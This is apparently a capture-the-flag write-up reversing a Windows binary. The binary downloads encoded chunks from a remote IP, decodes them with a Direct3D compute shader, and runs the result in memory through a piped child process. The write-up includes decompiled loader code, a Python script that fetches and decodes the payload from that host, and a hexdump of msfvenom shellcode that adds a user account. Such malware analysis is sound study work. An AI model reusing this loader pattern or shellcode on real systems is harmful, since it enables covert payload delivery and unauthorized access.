Graphical Malware
Challenge discovery
$ file graphical.exe
graphical.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 10 sections
The binary is stripped so no symbols (only binary symbols are removed external libs still get their symbols to make it easier to reverse)
Some strings in the binary could give us some hints:
D3D11CreateDevice
Microsoft (R) HLSL Shader Compiler 10.1
We will be dealing with some shader in this binary
Reverse the malware
The main fucntion could be found at offset 0x7B4
Child creation
if ( !strcmp(*(const char **)(a2 + 8), "shutlock") )
{
sub_140001E8B();
return 0LL;
}
if ( !strcmp(*(const char **)(a2 + 8), "ctf") )
{
sub_140001F40();
return 0LL;
}
First it will check is argv[1] is either shutlock or ctf and if so it will run either sub_140001E8B or sub_140001F40, if argv[1] is neither shutlock or ctf it will continue the main function.
It will create a PIPE (that on Windows is one of the way wich multiple process could communicates with each others):
PipeAttributes.nLength = 24;
PipeAttributes.lpSecurityDescriptor = 0LL;
PipeAttributes.bInheritHandle = 1;
CreatePipe(&hReadPipe, &hWritePipe, &PipeAttributes, 0)
Then it will create 2 processes:
GetModuleFileNameA(0LL, Filename, 0x104u);
_snprintf_s(Buffer, 0x104uLL, 0x104uLL, "\"%s\" %s", Filename, "shutlock");
_snprintf_s(CommandLine, 0x104uLL, 0x104uLL, "\"%s\" %s", Filename, "ctf");
StartupInfo.hStdOutput = hWritePipe;
dwFlags = StartupInfo.dwFlags;
BYTE1(dwFlags) = BYTE1(StartupInfo.dwFlags) | 1;
StartupInfo.dwFlags = dwFlags;
if ( CreateProcessA(0LL, Buffer, 0LL, 0LL, 1, 0, 0LL, 0LL, &StartupInfo, &ProcessInformation) )
{
CloseHandle(hWritePipe);
WaitForSingleObject(ProcessInformation.hProcess, 0xFFFFFFFF);
lpStartupInfo.hStdInput = hReadPipe;
v6 = lpStartupInfo.dwFlags;
BYTE1(v6) = BYTE1(lpStartupInfo.dwFlags) | 1;
lpStartupInfo.dwFlags = v6;
if ( CreateProcessA(0LL, CommandLine, 0LL, 0LL, 1, 0, 0LL, 0LL, &lpStartupInfo, &hHandle) )
{
CloseHandle(hReadPipe);
WaitForSingleObject(hHandle.hProcess, 0xFFFFFFFF);
CloseHandle(ProcessInformation.hProcess);
CloseHandle(ProcessInformation.hThread);
CloseHandle(hHandle.hProcess);
CloseHandle(hHandle.hThread);
sub_140001360("Finished\n");
return 0LL;
}
First it will run itself with argv[1] = shutlock and redirect stdout of this child to the previously created pipe : StartupInfo.hStdOutput = hWritePipe;, and then it will run itself with argv[1] = ctf and redirect the pipe to stdin of this child: lpStartupInfo.hStdInput = hReadPipe;.
For the rest of this writeup we will call child1 the child run with arg[1] = shutlock and child2 the one run with ctf
Child1
If we look back at the beginning of the function we saw that if argv[1] is shutlock it will run sub_140001E8B, we will rename this function child1_main:
__int64 child1_main()
{
FILE *v1; // rax
int v2; // eax
FILE *v3; // rax
FILE *v4; // rax
size_t ElementCount; // [rsp+20h] [rbp-10h]
void *Buffer; // [rsp+28h] [rbp-8h]
Buffer = (void *)sub_140001CE5();
if ( !Buffer )
return 1LL;
v1 = (FILE *)off_14000A0D0();
v2 = _fileno(v1);
_setmode(v2, 0x8000);
ElementCount = (int)sub_140001ACA();
v3 = (FILE *)off_14000A0D0();
fwrite(Buffer, 1uLL, ElementCount, v3);
v4 = (FILE *)off_14000A0D0();
fflush(v4);
free(Buffer);
return 0LL;
}
The child1 main function is super simple, it create a buffer with sub_140001CE5() and write it to stdout, let’s look at sub_140001CE5, that we will rename get_buf:
void *get_buf()
{
int v1; // eax
int v2; // eax
_QWORD Src[3]; // [rsp+20h] [rbp-30h] BYREF
void *Block; // [rsp+38h] [rbp-18h]
int v5; // [rsp+40h] [rbp-10h]
int v6; // [rsp+44h] [rbp-Ch]
int v7; // [rsp+48h] [rbp-8h]
int i; // [rsp+4Ch] [rbp-4h]
v6 = sub_140001ACA();
if ( v6 <= 0 )
return 0LL;
v1 = v6 + 15;
if ( v6 + 15 < 0 )
v1 = v6 + 30;
v5 = v1 >> 4;
Block = malloc(v6);
if ( !Block )
return 0LL;
for ( i = 0; i < v5; ++i )
{
Src[0] = 0LL;
Src[1] = 0LL;
Sleep(0x927C0u);
if ( (unsigned int)sub_1400018B1((unsigned int)i, Src) )
{
free(Block);
return 0LL;
}
if ( i == v5 - 1 )
v2 = v6 % 16;
else
v2 = 16;
v7 = v2;
if ( !v2 )
v7 = 16;
memcpy((char *)Block + 16 * i, Src, v7);
}
return Block;
}
It get a int from sub_140001ACA malloc it and iterate from 0 to size//16 ( v1 = v6 + 15; v5 = v1 » 4;) , do a big sleep between each and call sub_1400018B1, let’s look at thoses 2 function, first the one that retrieve the size let’s rename it get_size:
__int64 sub_140001ACA()
{
WCHAR szUrl[70]; // [rsp+30h] [rbp-50h] BYREF
DWORD dwNumberOfBytesRead; // [rsp+BCh] [rbp+3Ch] BYREF
_QWORD Buffer[12]; // [rsp+C0h] [rbp+40h] BYREF
int v4; // [rsp+120h] [rbp+A0h]
unsigned int v5; // [rsp+12Ch] [rbp+ACh]
HINTERNET hFile; // [rsp+130h] [rbp+B0h]
HINTERNET hInternet; // [rsp+138h] [rbp+B8h]
hFile = 0LL;
memset(Buffer, 0, sizeof(Buffer));
v4 = 0;
dwNumberOfBytesRead = 0;
v5 = 0;
hInternet = InternetOpenW(L"HTTPGET", 1u, 0LL, 0LL, 0);
if ( !hInternet )
return 0xFFFFFFFFLL;
sub_140001828(szUrl, 64LL, L"http://%ls/size", L"57.128.85.25:50002");
hFile = InternetOpenUrlW(hInternet, szUrl, 0LL, 0, 0x2400u, 0LL);
if ( hFile )
{
if ( InternetReadFile(hFile, Buffer, 0x63u, &dwNumberOfBytesRead) )
{
*((_BYTE *)Buffer + dwNumberOfBytesRead) = 0;
v5 = atoi((const char *)Buffer);
InternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
return v5;
}
else
{
InternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
return 0xFFFFFFFFLL;
}
}
else
{
InternetCloseHandle(hInternet);
return 0xFFFFFFFFLL;
}
}
It do a GET request on http://57.128.85.25:50002/size , parse the result as int atoi((const char *)Buffer); and return it
Now what’s sub_1400018B1 that we will rename get_part:
__int64 __fastcall get_part(int a1, void *encoded_buff)
{
__int64 v3; // [rsp+0h] [rbp-80h] BYREF
__int64 dwFlags; // [rsp+20h] [rbp-60h]
WCHAR szUrl[258]; // [rsp+30h] [rbp-50h] BYREF
DWORD dwNumberOfBytesRead; // [rsp+234h] [rbp+1B4h] BYREF
void *Src; // [rsp+238h] [rbp+1B8h]
HINTERNET hFile; // [rsp+240h] [rbp+1C0h]
HINTERNET hInternet; // [rsp+248h] [rbp+1C8h]
hInternet = 0LL;
hFile = 0LL;
dwNumberOfBytesRead = 0;
LODWORD(dwFlags) = a1 + 1;
sub_140001828((__int64)(&v3 + 6), 256LL, (__int64)L"http://%ls/%d", L"57.128.85.25:50002", dwFlags);
hInternet = InternetOpenW(L"HTTPGET", 1u, 0LL, 0LL, 0);
if ( !hInternet )
return 1LL;
Sleep(0x927C0u);
hFile = InternetOpenUrlW(hInternet, szUrl, 0LL, 0, 0x2400u, 0LL);
if ( hFile )
{
if ( InternetReadFile(hFile, encoded_buff, 0x10u, &dwNumberOfBytesRead) )
{
InternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
Src = (void *)decode(a1, (__int64)encoded_buff, dwNumberOfBytesRead);
if ( Src )
{
memcpy(encoded_buff, Src, dwNumberOfBytesRead);
free(Src);
return 0LL;
}
else
{
return 0xFFFFFFFFLL;
}
}
else
{
InternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
return 1LL;
}
}
else
{
InternetCloseHandle(hInternet);
return 1LL;
}
}
It also do a GET request on the IP to retrieve the n-th part and then call : decode(a1, (__int64)encoded_buff, dwNumberOfBytesRead) that will call (__int64)sub_140002353(encoded_buff, size, 0xDEADBEEF - 0x42 * a1); that we will call gpu_decode
void *__fastcall gpu_decode(__int64 encoded_buff, size_t size, unsigned int key)
{
_QWORD *v4; // rcx
__int64 v5; // rdx
__int64 v6; // [rsp+58h] [rbp-28h] BYREF
_QWORD *v7; // [rsp+60h] [rbp-20h] BYREF
__int64 v8; // [rsp+70h] [rbp-10h]
__int64 v9; // [rsp+78h] [rbp-8h]
__int64 v10; // [rsp+80h] [rbp+0h] BYREF
int v11; // [rsp+88h] [rbp+8h]
unsigned int v12; // [rsp+8Ch] [rbp+Ch]
int v13; // [rsp+90h] [rbp+10h]
__int64 v14; // [rsp+A0h] [rbp+20h]
__int64 v15; // [rsp+A8h] [rbp+28h]
__int64 v16; // [rsp+B0h] [rbp+30h]
__int128 v17; // [rsp+C0h] [rbp+40h]
__int64 v18; // [rsp+D8h] [rbp+58h] BYREF
__int64 v19; // [rsp+E0h] [rbp+60h] BYREF
__int64 v20; // [rsp+E8h] [rbp+68h] BYREF
ID3D11DeviceContext *ppImmediateContext; // [rsp+F0h] [rbp+70h] BYREF
ID3D11Device *ppDevice; // [rsp+F8h] [rbp+78h] BYREF
void *v23; // [rsp+100h] [rbp+80h]
unsigned int v24; // [rsp+108h] [rbp+88h]
unsigned int v25; // [rsp+10Ch] [rbp+8Ch]
LPVOID v26; // [rsp+110h] [rbp+90h]
HGLOBAL hResData; // [rsp+118h] [rbp+98h]
DWORD v28; // [rsp+124h] [rbp+A4h]
HRSRC hResInfo; // [rsp+128h] [rbp+A8h]
unsigned int v30; // [rsp+130h] [rbp+B0h]
unsigned int v31; // [rsp+134h] [rbp+B4h]
HRESULT v32; // [rsp+138h] [rbp+B8h]
int v33; // [rsp+13Ch] [rbp+BCh]
__int64 v34; // [rsp+140h] [rbp+C0h]
__int64 v35; // [rsp+148h] [rbp+C8h]
ppDevice = 0LL;
ppImmediateContext = 0LL;
v35 = 0LL;
v34 = 0LL;
v20 = 0LL;
v19 = 0LL;
v18 = 0LL;
v33 = size;
v32 = D3D11CreateDevice(0LL, D3D_DRIVER_TYPE_HARDWARE, 0LL, 0, 0LL, 0, 7u, &ppDevice, 0LL, &ppImmediateContext);
if ( v32 < 0 )
{
sub_1400020D0("D3D11CreateDevice failed\n");
return 0LL;
}
v17 = 0LL;
v16 = 0LL;
v14 = 0x200000010LL;
v15 = 0x1000000000004LL;
v19 = sub_140002263((__int64)ppDevice, 16, 4u, 2, 0);
if ( v19 )
{
v31 = size;
v30 = (size + 3) & 0xFFFFFFFC;
v35 = sub_140002263((__int64)ppDevice, v30, 0x88u, 0, 0);
v34 = sub_140002263((__int64)ppDevice, v30, 0, 3, 1);
if ( v35 && v34 )
{
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD, __int64, _DWORD, _DWORD))ppImmediateContext->lpVtbl->UpdateSubresource)(
ppImmediateContext,
v35,
0LL,
0LL,
encoded_buff,
0,
0);
v13 = _mm_cvtsi128_si32((__m128i)0LL);
v10 = 0x100000000LL;
v11 = 0;
v12 = v30 >> 2;
v8 = key;
v9 = 0LL;
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, __int64, _DWORD, _QWORD **))ppImmediateContext->lpVtbl->Map)(
ppImmediateContext,
v19,
0LL,
4LL,
0,
&v7);
v4 = v7;
v5 = v9;
*v7 = v8;
v4[1] = v5;
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD))ppImmediateContext->lpVtbl->Unmap)(
ppImmediateContext,
v19,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *))ppImmediateContext->lpVtbl->CSSetConstantBuffers)(
ppImmediateContext,
0LL,
1LL,
&v19);
v32 = ((__int64 (__fastcall *)(ID3D11Device *, __int64, __int64 *, __int64 *))ppDevice->lpVtbl->CreateUnorderedAccessView)(
ppDevice,
v35,
&v10,
&v20);
if ( v32 >= 0 )
{
hResInfo = FindResourceA(0LL, (LPCSTR)0x65, (LPCSTR)0xA);
if ( hResInfo )
{
v28 = SizeofResource(0LL, hResInfo);
hResData = LoadResource(0LL, hResInfo);
if ( hResData )
{
v26 = LockResource(hResData);
v32 = ((__int64 (__fastcall *)(ID3D11Device *, LPVOID, _QWORD, _QWORD, __int64 *))ppDevice->lpVtbl->CreateComputeShader)(
ppDevice,
v26,
v28,
0LL,
&v18);
if ( v32 >= 0 )
{
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
ppImmediateContext,
0LL,
1LL,
&v20,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
ppImmediateContext,
v18,
0LL,
0LL);
v25 = (unsigned int)(v33 + 3) >> 2;
v24 = (v25 + 255) >> 8;
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64))ppImmediateContext->lpVtbl->Dispatch)(
ppImmediateContext,
v24,
1LL,
1LL);
v6 = 0LL;
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
ppImmediateContext,
0LL,
1LL,
&v6,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
ppImmediateContext,
0LL,
0LL,
0LL);
v23 = malloc(size);
if ( (unsigned int)sub_140002182((__int64)ppImmediateContext, v35, v34, (__int64)v23, v31) )
return v23;
}
else
{
puts("CreateComputeShader failed");
}
}
else
{
puts("LoadResource failed");
}
}
else
{
puts("FindResource failed");
}
}
else
{
sub_1400020D0("CreateUAV failed\n");
}
}
else
{
sub_1400020D0("buffer creation failed\n");
}
}
else
{
puts("Create constant buffer failed");
}
if ( v20 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v20 + 16LL))(v20);
if ( v18 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v18 + 16LL))(v18);
if ( v35 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v35 + 16LL))(v35);
if ( v34 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v34 + 16LL))(v34);
if ( ppImmediateContext )
((void (__fastcall *)(ID3D11DeviceContext *))ppImmediateContext->lpVtbl->Release)(ppImmediateContext);
if ( ppDevice )
((void (__fastcall *)(ID3D11Device *))ppDevice->lpVtbl->Release)(ppDevice);
if ( v19 )
(*(void (__fastcall **)(__int64))(*(_QWORD *)v19 + 16LL))(v19);
return 0LL;
}
This function use the Direct3D 11 (https://fr.wikipedia.org/wiki/Direct3D ) that according to Wikipedia: “Direct3D is a graphics application programming interface (API) for Microsoft Windows. Part of DirectX, Direct3D is used to render three-dimensional graphics in applications where performance is important, such as games.”
So why is there some 3D libs in a binary that look like a malware ?
Let’s get a better understanding of the function, the function do:
First it create a Direct3D device and initialise it and load the encoded_buffer in it
D3D11CreateDevice(0LL, D3D_DRIVER_TYPE_HARDWARE, 0LL, 0, 0LL, 0, 7u, &ppDevice, 0LL, &ppImmediateContext);
(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD, __int64, _DWORD, _DWORD))ppImmediateContext->lpVtbl->UpdateSubresource)(
ppImmediateContext,
v35,
0LL,
0LL,
encoded_buff,
0,
0);
(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, __int64, _DWORD, _QWORD **))ppImmediateContext->lpVtbl->Map)(
ppImmediateContext,
v19,
0LL,
4LL,
0,
&v7);
(void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD))ppImmediateContext->lpVtbl->Unmap)(
ppImmediateContext,
v19,
0LL);
(void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *))ppImmediateContext->lpVtbl->CSSetConstantBuffers)(
ppImmediateContext,
0LL,
1LL,
&v19);
(__int64 (__fastcall *)(ID3D11Device *, __int64, __int64 *, __int64 *))ppDevice->lpVtbl->CreateUnorderedAccessView)(
ppDevice,
v35,
&v10,
&v20);
Then it load the resource with the ID 0x65 (101)
hResInfo = FindResourceA(0LL, (LPCSTR)0x65, (LPCSTR)0xA);
v28 = SizeofResource(0LL, hResInfo);
hResData = LoadResource(0LL, hResInfo);
v26 = LockResource(hResData);
Then it use the resource to create a shader
v32 = ((__int64 (__fastcall *)(ID3D11Device *, LPVOID, _QWORD, _QWORD, __int64 *))ppDevice->lpVtbl->CreateComputeShader)(
ppDevice,
v26,
v28,
0LL,
&v18);
if ( v32 >= 0 )
{
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
ppImmediateContext,
0LL,
1LL,
&v20,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, __int64, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
ppImmediateContext,
v18,
0LL,
0LL);
v25 = (unsigned int)(v33 + 3) >> 2;
v24 = (v25 + 255) >> 8;
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64))ppImmediateContext->lpVtbl->Dispatch)(
ppImmediateContext,
v24,
1LL,
1LL);
v6 = 0LL;
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, __int64, __int64 *, _QWORD))ppImmediateContext->lpVtbl->CSSetUnorderedAccessViews)(
ppImmediateContext,
0LL,
1LL,
&v6,
0LL);
((void (__fastcall *)(ID3D11DeviceContext *, _QWORD, _QWORD, _QWORD))ppImmediateContext->lpVtbl->CSSetShader)(
ppImmediateContext,
0LL,
0LL,
0LL);
And finally it create a buffer and call sub_140002182
v23 = malloc(a2);
if ( (unsigned int)sub_140002182((_DWORD)ppImmediateContext, v35, v34, (_DWORD)v23, v31) )
return v23;
Retrieve the shader
We know that the shader is loaded from a with ID: 101 (wich is located in the .rsrc section), we can use many techniques to retrieve it, but I usualy do it using PEstudio (https://www.winitor.com/download , the free version is enough), we load graphical.exe in it and then we can look at the resources panel.

We can see that there is the resource we are looking for with ID:101, we can dump it using Right Click -> instance -> save to file, we also see that the first bytes of the resource is DXBC wich with a bit of Googling indicate that it’s a shader bytecode for Direct3D.
We can decompile it using fxc :
C:/Program\ Files\ \(x86\)/Windows\ Kits/10/bin/10.0.22621.0/x64/fxc.exe /dumpbin /nologo ressource.dump
//
// Generated by Microsoft (R) HLSL Shader Compiler 10.1
//
//
// Buffer Definitions:
//
// cbuffer KeyCB
// {
//
// uint xorKey; // Offset: 0 Size: 4
//
// }
//
// Resource bind info for gData
// {
//
// uint $Element; // Offset: 0 Size: 4
//
// }
//
//
// Resource Bindings:
//
// Name Type Format Dim HLSL Bind Count
// ------------------------------ ---------- ------- ----------- -------------- ------
// gData UAV struct r/w u0 1
// KeyCB cbuffer NA NA cb0 1
//
//
//
// Input signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// no Input
//
// Output signature:
//
// Name Index Mask Register SysValue Format Used
// -------------------- ----- ------ -------- -------- ------- ------
// no Output
cs_5_0
dcl_globalFlags refactoringAllowed
dcl_constantbuffer CB0[1], immediateIndexed
dcl_uav_structured u0, 4
dcl_input vThreadID.x
dcl_temps 1
dcl_thread_group 256, 1, 1
bufinfo_indexable(structured_buffer, stride=4)(mixed,mixed,mixed,mixed) r0.x, u0.xyzw
ult r0.x, vThreadID.x, r0.x
if_nz r0.x
ld_structured_indexable(structured_buffer, stride=4)(mixed,mixed,mixed,mixed) r0.x, vThreadID.x, l(0), u0.xxxx
xor r0.x, r0.x, cb0[0].x
iadd r0.x, r0.x, l(0x11001122)
store_structured u0.x, vThreadID.x, l(0), r0.x
endif
ret
// Approximately 9 instruction slots used
The shader is simple it that the buffer (gData) into u0, the key (KeyCB) into cb0, xor them together and then add 0x11001122 to the result.
Ok now we understand how all part is decoded, it derive the key for each part : 0xDEADBEEF - 0x42 * i (i beeing the i-th part of the encoded data), xor the encoded data with the derivated key and then add 0x11001122.
If we go back to get_buf, each decoded block is append to the previous one : memcpy((char *)Block + 16 * i, Src, v7); and then returned to child1_main, and then it’s just printed to stdout. That cannot do any dammage ?
Child2
If we remember what we saw in the main everything printed to stdout of the 1st child will be redirect to the Pipe and then redirect to Child2 (because stdin of the 2nd child is the Pipe), so let’s take a look of the main function for the 2nd child :
__int64 child2_main()
{
FILE *v0; // rax
int v1; // eax
FILE *v3; // rax
DWORD flOldProtect; // [rsp+34h] [rbp-2Ch] BYREF
HANDLE hHandle; // [rsp+38h] [rbp-28h]
BOOL v6; // [rsp+44h] [rbp-1Ch]
void *lpAddress; // [rsp+48h] [rbp-18h]
void *Buffer; // [rsp+50h] [rbp-10h]
size_t Size; // [rsp+5Ch] [rbp-4h]
flOldProtect = 0;
v0 = (FILE *)off_14000A0D0();
v1 = _fileno(v0);
_setmode(v1, 0x8000);
LODWORD(Size) = get_size();
if ( !(_DWORD)Size || (unsigned int)Size > 0x1000 )
return 1LL;
Buffer = malloc((unsigned int)Size);
if ( !Buffer )
return 1LL;
v3 = (FILE *)off_14000A0D0();
if ( fread(Buffer, 1uLL, (unsigned int)Size, v3) == (unsigned int)Size )
{
lpAddress = VirtualAlloc(0LL, (unsigned int)Size, 0x3000u, 4u);
memmove(lpAddress, Buffer, (unsigned int)Size);
v6 = VirtualProtect(lpAddress, (unsigned int)Size, 0x20u, &flOldProtect);
hHandle = CreateThread(0LL, 0LL, (LPTHREAD_START_ROUTINE)lpAddress, 0LL, 0, 0LL);
WaitForSingleObject(hHandle, 0xFFFFFFFF);
return 0LL;
}
else
{
puts("stdin read error");
free(Buffer);
return 1LL;
}
}
The child2’s main function is really straigth forward, it retrieve the payload size (using the same http request than in the 1st child), read that size from stdin and then do a classic VirtualAlloc->VirtualProtect->CreateThread to execute what have been read.
Get the final stage payload
So in summary the binary work like that:
- Create 2 childs
- Child1 -> get N part of 16byte each from a remote -> decode it in the GPU -> write the decoded payload to stdin of the 2nd child thru the pipe
- Child2 -> read the decoded payload -> Execute it
We just need to retrive each payload part, decode them and we should get some valid executable code, here is a python3 script that do thoses steps:
import requests
from pathlib import Path
from struct import unpack_from, pack_into
URL = "http://57.128.85.25:50002"
BASE_KEY = 0xDEADBEEF
session = requests.Session()
def fetch(path: str) -> bytes:
url = f"{URL}/{path.lstrip('/')}"
resp = session.get(url, timeout=10)
resp.raise_for_status()
return resp.content
def decode_chunk(chunk, part) -> bytes:
key = (BASE_KEY - (part - 1) * 0x42) & 0xFFFFFFFF
buf = bytearray(chunk)
for off in range(0, len(chunk), 4):
dword = int.from_bytes(buf[off:off+4].ljust(4, b"\0"), "little")
plain32 = ((dword ^ key) + 0x11001122) & 0xFFFF_FFFF
pack_into("<I", buf, off, plain32)
return bytes(buf[:len(chunk)])
def main():
plaintext = bytearray()
for i in range(1, 20):
buf = fetch(str(i))
decoded = decode_chunk(buf, i)
plaintext.extend(decoded)
with open("payload.bin","wb") as f:
f.write(plaintext)
if __name__ == "__main__":
main()
Flag
Once we run this payload we get the final payload :
hexdump -C payload.bin
00000000 fc 48 83 e4 f0 e8 c0 00 00 00 41 51 41 50 52 51 |.H........AQAPRQ|
00000010 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 |VH1.eH.R`H.R.H.R|
00000020 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 | H.rPH..JJM1.H1.|
00000030 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed |.<a|., A...A....|
00000040 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 8b 80 88 |RAQH.R .B<H.....|
00000050 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 |...H..tgH..P.H.D|
00000060 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 |.@ I...VH..A.4.H|
00000070 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 |..M1.H1..A...A..|
00000080 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 |8.u.L.L$.E9.u.XD|
00000090 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 |.@$I..fA..HD.@.I|
000000a0 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a |..A...H..AXAX^YZ|
000000b0 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 |AXAYAZH.. AR..XA|
000000c0 59 5a 48 8b 12 e9 57 ff ff ff 5d 48 ba 01 00 00 |YZH...W...]H....|
000000d0 00 00 00 00 00 48 8d 8d 01 01 00 00 41 ba 31 8b |.....H......A.1.|
000000e0 6f 87 ff d5 bb f0 b5 a2 56 41 ba a6 95 bd 9d ff |o.......VA......|
000000f0 d5 48 83 c4 28 3c 06 7c 0a 80 fb e0 75 05 bb 47 |.H..(<.|....u..G|
00000100 13 72 6f 6a 00 59 41 89 da ff d5 6e 65 74 20 75 |.roj.YA....net u|
00000110 73 65 72 20 47 50 55 5f 6d 34 6c 77 61 72 65 73 |ser GPU_m4lwares|
00000120 5f 41 52 45 5f 66 75 6e 20 74 44 74 4e 52 59 4a |_ARE_fun tDtNRYJ|
We can see a strings in plaintext at the end : net user GPU_m4lwares_ARE_fun tDtNRYJ, that is a command on windows to add a user (it’s a msfvenom shellcode to add a user on the PC)